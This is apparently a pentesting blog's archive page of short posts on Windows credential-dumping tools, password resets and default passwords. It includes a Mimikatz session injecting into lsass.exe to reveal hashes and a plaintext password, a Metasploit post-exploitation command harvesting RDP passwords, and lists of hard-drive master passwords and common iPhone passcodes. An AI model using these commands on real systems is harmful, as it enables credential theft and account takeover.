pentesting, pci, red team

Quarks PwDump

May 22nd, 2012 by admin in cracking, Password Info, Privilege Escalation

Quarks PwDump is new open source tool to dump various types of Windows credentials:

It currently extracts :

  • Local accounts NT/LM hashes + history
  • Domain accounts NT/LM hashes + history
  • Cached domain password
  • Bitlocker recovery information (recovery passwords & key packages)

The tool is currently dedicated to work live on operating systems without injecting in any process, limiting the risk of undermining their integrity or stability. it requires administrator’s privileges and is still in beta test. more info

MimiKatz – clear text passwords

March 29th, 2012 by admin in Password Info, windows

As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French

Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)

mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/

Windows Credentials Editor (WCE) 1.3 x64 released

March 14th, 2012 by admin in cracking, Password Info, Privilege Escalation, windows

Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems. Also dumps passwords in plain-text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)

Frequently Asked Questions (FAQ) available here.

Estimating Password and Token Entropy in Web Apps

February 22nd, 2012 by admin in cracking, Password Info

Ryan O’Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha, check it out on IOActive’s Blog

How secure is your password?

November 28th, 2011 by admin in cracking, Life, News, Password Info

Just head over to the service’s website and enter a password in the form. You do not necessarily have to enter a password that you use actively. You can alternatively enter a comparable password to find out how long it would take to hack your password with a brute force, or maybe a combined dictionary and brute force attack.

Hard Drive Master Passwords

October 16th, 2011 by admin in Password Info, Privilege Escalation

Here’s a small compilation of passwords. If you have any to add please email us. We also can crack DELL HDD passwords for $10 ::Here::

SEAGATE -> “Seagate” +25 spaces

series N40P -> “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces
series N40P -> “Maxtor INIT SECURITY TEST STEP F”
series 541DX -> “Maxtor” +24 spaces
series Athena (D541X model 2B) and diamondmax80 -> “Maxtor”


FUJITSU -> 32 spaces

SAMSUNG -> “ttttttttttttttttttttttttttttttttt” (32 times t)

series DTTA -> “CED79IJUFNATIT” +18 spaces
series DJNA -> “VON89IJUFSUNAJ” +18 spaces
series DPTA -> “VON89IJUFSUNAJ” +18 spaces
series DTLA -> “RAM00IJUFOTSELET” +16 spaces
series DADA-26480 (6,4gb) -> “BEF89IJUF__AIDACA” +15 spaces

HITACHI series DK23AA, DK23BA and DK23CA -> 32 spaces

TOSHIBA -> 32 spaces

For xbox hdds try “XBOXSCENE” or “TEAMASSEMBLY” too

There is also some software available to reset the password called MHDD, another suggested program is ATAPWD. A Commercial tool from HDDLock claims to unlock drives and prices vary with drive size.

Password Reset CD

October 7th, 2011 by admin in Password Info, Privilege Escalation

Looks like is now offering their password reset CD for free on their site. Click the image to download it.

PCLoginNow is an easy-to-use tool to reset local administrator and other accounts passwords on Windows system. No need to reinstall the system. It resets Windows passwords and Windows security settings instantly. All version of Windows are completely supported.

Aim Recover

October 7th, 2011 by admin in AIM, Our Tools, Password Info

Working on a newer version of our AIM password recovery tool. The newer versions of AIM 7.x changed the way they stored the saved passwords. More info to come soon 🙂

Metasploit .RDP password module

August 2nd, 2011 by admin in Our Tools, Password Info

Just finished a new module for metasploit meterpreter post-exploitation
Once you gain a meterpreter session just run
run post/windows/gather/enum_rdp_pwd

meterpreter > run post/windows/gather/enum_rdp_pwd

[*] Searching for *.rdp files in C:\Users\Will\Documents

[*] Found: C:\Users\Will\Documents\Default.rdp
[*] Host:
[*] User: Administrator
[*] Pass: metasploit


Top 10 iPhone unlock codes

June 16th, 2011 by admin in Apple, Password Info

In his last update to Big Brother Camera Security, Daniel Amitay added some code to record common user passcodes. Because Big Brother’s passcode setup screen and lock screen are nearly identical to those of the actual iPhone passcode lock, Daniel figured that the collected information would closely correlate with actual iPhone passcodes. Out of 204,508 recorded passcodes, the top ten most common were:
[1234, 0000, 2580, 1111, 5555, 5683, 0852, 2222, 1212, 1998]


« Previous ArticleNext Article »